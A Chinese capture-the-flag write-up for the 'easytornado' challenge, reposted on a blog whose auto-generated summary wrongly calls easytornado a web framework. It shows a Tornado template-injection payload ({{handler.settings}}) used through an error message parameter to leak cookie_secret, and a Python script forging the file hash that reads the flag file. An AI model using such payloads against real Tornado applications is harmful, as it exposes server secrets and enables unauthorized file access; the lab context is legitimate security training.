easytornado-攻防世界,easytornado,攻防世界实战指南

马肤

温馨提示:这篇文章已超过464天没有更新,请注意相关的内容是否还可用!

摘要:easytornado是一个基于Tornado框架的Web开发框架,旨在提供简单易用的Web开发体验。攻防世界则是一个关于网络安全攻防技术的领域,涉及到网络安全技术、攻防策略等多个方面。easytornado在攻防世界中的应用可能包括使用Web开发技术构建安全的应用程序,提高应用程序的安全性和防护能力,以应对网络攻击和威胁。

题目

easytornado-攻防世界,easytornado,攻防世界实战指南 第1张

easytornado-攻防世界,easytornado,攻防世界实战指南 第2张

看到flag.txt点击进去

easytornado-攻防世界,easytornado,攻防世界实战指南 第3张

easytornado-攻防世界,easytornado,攻防世界实战指南 第4张 easytornado-攻防世界,easytornado,攻防世界实战指南 第5张

题中提示render 

可以观察url

 

61.147.171.105:51567/file?filename=/hints.txt&filehash=61c9f13a8bae46973d56ca4a693847d5

 

由文件名和文件的hash值可查询对应文件内容,现在就差个cookie_secret不知道

那么如何获得cookie_secret呢?

查到cookie_secret在application对象settings属性中,

self.application.settings可以用handler替代

handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload

{{handler.settings}}

Tornado全称Tornado Web Server,是一个用Python语言写成的Web服务器兼Web应用框架

tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式

tornado render模板注入

SSTI模板注入学习 - fdx_xdf - 博客园 (cnblogs.com)

查询到可以使用{{handler.settings}}获取服务器的配置文件信息

playload

/file?filename={{handler.settings }}

报错了

61.147.171.105:51567/error?msg=Error

观察到Error与下方Error报错信息相同

easytornado-攻防世界,easytornado,攻防世界实战指南 第6张

将读取配置文件的代码放到msg后面。

构造payload:

error?msg={{handler.settings}} 

easytornado-攻防世界,easytornado,攻防世界实战指南 第7张

成功拿到 

'cookie_secret': 'a4860747-2d1b-4084-815e-56d946ad036f'}

import hashlib

def md5(message):

    md5 = hashlib.md5()

    md5.update(message.encode('utf-8'))

    return md5.hexdigest()

def main(salt, name):

    print(md5(salt + md5(name)))

if __name__ == "__main__":

    cookie_secret='a4860747-2d1b-4084-815e-56d946ad036f'

    filename = "/fllllllllllllag"

    main(cookie_secret, filename)

 

 

 easytornado-攻防世界,easytornado,攻防世界实战指南 第8张

easytornado-攻防世界,easytornado,攻防世界实战指南 第9张 

73e4ae0d5195c1529b924a29c28823c7

拿到了最后的md5值 ,但是搞了半天flag不出来。

61.147.171.105:51567/file?filename=/fllllllllllllag&filehash=73e4ae0d5195c1529b924a29c28823c7

easytornado-攻防世界,easytornado,攻防世界实战指南 第10张


0
收藏0
文章版权声明:除非注明,否则均为VPS857原创文章,转载或复制请以超链接形式并注明出处。

相关阅读

  • 【研发日记】Matlab/Simulink自动生成代码(二)——五种选择结构实现方法,Matlab/Simulink自动生成代码的五种选择结构实现方法(二),Matlab/Simulink自动生成代码的五种选择结构实现方法详解(二)
  • 超级好用的C++实用库之跨平台实用方法,跨平台实用方法的C++实用库超好用指南,C++跨平台实用库使用指南,超好用实用方法集合,C++跨平台实用库超好用指南,方法与技巧集合
  • 【动态规划】斐波那契数列模型(C++),斐波那契数列模型(C++实现与动态规划解析),斐波那契数列模型解析与C++实现(动态规划)
  • 【C++】,string类底层的模拟实现,C++中string类的模拟底层实现探究
  • uniapp 小程序实现微信授权登录(前端和后端),Uniapp小程序实现微信授权登录全流程(前端后端全攻略),Uniapp小程序微信授权登录全流程攻略,前端后端全指南
  • Vue脚手架的安装(保姆级教程),Vue脚手架保姆级安装教程,Vue脚手架保姆级安装指南,Vue脚手架保姆级安装指南,从零开始教你如何安装Vue脚手架
  • 如何在树莓派 Raspberry Pi中本地部署一个web站点并实现无公网IP远程访问,树莓派上本地部署Web站点及无公网IP远程访问指南,树莓派部署Web站点及无公网IP远程访问指南,本地部署与远程访问实践,树莓派部署Web站点及无公网IP远程访问实践指南,树莓派部署Web站点及无公网IP远程访问实践指南,本地部署与远程访问详解,树莓派部署Web站点及无公网IP远程访问实践详解,本地部署与远程访问指南,树莓派部署Web站点及无公网IP远程访问实践详解,本地部署与远程访问指南。
  • vue2技术栈实现AI问答机器人功能(流式与非流式两种接口方法),Vue2技术栈实现AI问答机器人功能,流式与非流式接口方法探究,Vue2技术栈实现AI问答机器人功能,流式与非流式接口方法详解
  • 发表评论

    快捷回复:表情:
    评论列表 (暂无评论,0人围观)

    还没有评论,来说两句吧...

    目录[+]

    取消
    微信二维码
    微信二维码
    支付宝二维码